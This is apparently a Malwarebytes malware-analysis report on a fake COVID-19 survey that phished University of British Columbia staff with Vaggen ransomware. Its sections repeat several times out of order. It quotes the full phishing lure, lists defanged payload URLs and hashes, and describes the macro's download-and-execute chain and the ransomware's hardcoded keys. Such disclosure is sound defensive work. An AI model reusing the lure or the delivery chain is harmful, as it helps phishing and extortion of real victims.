3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 754 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 755 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 756 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 757 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 758 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 759 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 760 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 761 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 762 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 763 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 764 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 765 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 766 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 767 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 768 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 769 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 770 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 771 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 772 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 773 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 774 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 775 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 776 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 777 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 778 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 779 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 780 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 781 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 782 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 survey.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 783 of 3467\n\nHowever, this attack and motives are different than the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto\r\nBox and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I 